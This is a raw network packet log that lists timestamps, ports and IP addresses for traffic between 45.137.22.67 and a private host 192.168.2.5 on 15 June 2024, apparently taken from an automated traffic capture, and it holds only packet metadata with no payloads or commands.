Jun 15, 2024 20:22:23.540004969 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.540018082 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.540030956 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.540057898 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.540071964 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.540082932 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.540172100 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.540185928 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.540198088 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.540210962 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.540225029 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.540237904 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.540251017 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.540263891 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.540288925 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.540302038 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.540313959 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.540328026 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.540339947 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.542465925 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.542499065 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.542511940 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.542537928 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.542551041 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.542562008 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.542587996 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.542601109 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.542613029 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.542624950 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.542741060 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.542768002 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.542781115 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.542793989 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.543766022 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.543792963 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.543916941 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.543934107 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.543951035 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.543991089 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.544014931 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.544051886 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.544069052 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.544085979 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.544102907 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.544120073 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.544244051 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.544291973 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.544462919 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.544884920 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.544917107 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.544934988 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.544951916 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545078993 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545157909 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545177937 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545195103 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545295000 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545314074 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545331955 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545365095 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545382023 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545398951 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545417070 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545434952 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545452118 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545484066 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545502901 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545520067 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545537949 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545557022 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545573950 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545591116 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545624018 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545640945 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545658112 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545675039 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545692921 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545713902 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545730114 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545763016 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545779943 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545799017 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545862913 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545923948 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.545996904 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546014071 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546032906 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546050072 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546066999 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546088934 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546108007 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546123981 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546140909 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546158075 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546175003 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546200991 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546216965 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546361923 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546380997 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546399117 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546416044 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546433926 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546462059 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546479940 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546497107 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546514034 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546535969 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546552896 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.546570063 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.678530931 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.680370092 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:24.680597067 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:24.680932999 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:24.680996895 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:24.681045055 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:24.681097984 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:24.681139946 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:24.681204081 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:24.681246996 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:24.681299925 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:24.681344032 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:24.681397915 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:24.681421995 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:24.687148094 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.687164068 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.687187910 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.687201023 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.687216043 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.687221050 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.687225103 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:24.687226057 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.687232018 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.687237978 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.687242985 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:24.687243938 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.687302113 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:24.691960096 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.691973925 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692028046 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692042112 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692074060 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692115068 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692126989 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692140102 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692156076 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692169905 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692197084 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692210913 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692222118 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692234039 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692250013 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692262888 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692311049 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692357063 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692369938 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692395926 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692410946 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.692425013 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.693425894 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:24.696865082 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.696893930 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.696943998 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.696970940 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.697076082 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.697103024 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.697263956 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.697292089 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.697319984 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.697357893 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.697427034 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.697453976 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702101946 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702130079 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702157974 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702184916 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702213049 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702239990 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702267885 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702295065 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702322960 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702352047 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702378988 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702408075 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702434063 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702461958 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702488899 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702518940 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702544928 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702574015 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702600956 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702627897 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702656031 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702682972 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702709913 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702739000 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702771902 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702852011 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702881098 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702908993 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702936888 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702965021 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.702991962 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703021049 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703047991 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703074932 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703103065 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703130007 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703157902 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703185081 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703217983 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703244925 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703273058 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703299999 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703325987 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703353882 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703381062 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703408957 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703437090 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703464031 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703494072 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703525066 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703561068 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703591108 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703617096 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703645945 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703674078 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703702927 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703730106 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703757048 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703785896 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703816891 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703849077 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703876972 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703934908 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703963041 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.703989983 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704018116 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704045057 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704072952 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704099894 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704128027 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704155922 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704183102 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704209089 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704236031 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704267979 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704307079 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704334021 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704418898 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704447031 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704474926 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704520941 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704549074 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704576015 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704602957 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704629898 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704657078 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704684973 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704713106 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704739094 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704766035 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704792976 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704818964 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704844952 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704871893 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704900980 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704926968 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.704953909 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705015898 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705044985 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705075026 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705111027 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705137968 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705164909 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705193043 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705219984 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705246925 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705272913 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705305099 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705332041 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705359936 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705388069 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705415010 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705442905 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705470085 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705498934 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.705524921 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707046986 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707092047 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707151890 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707180977 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707278013 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707307100 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707335949 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707362890 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707390070 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707417011 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707446098 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707473993 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707503080 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707530975 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707559109 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707587004 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707613945 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707649946 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707679033 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707706928 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707734108 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707761049 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707788944 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707817078 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707844019 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707871914 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707899094 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707926989 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707954884 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.707983017 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708009958 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708038092 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708065033 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708096981 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708125114 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708152056 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708179951 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708206892 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708235025 CEST	55615	49720	45.137.22.67	192.168.2.5
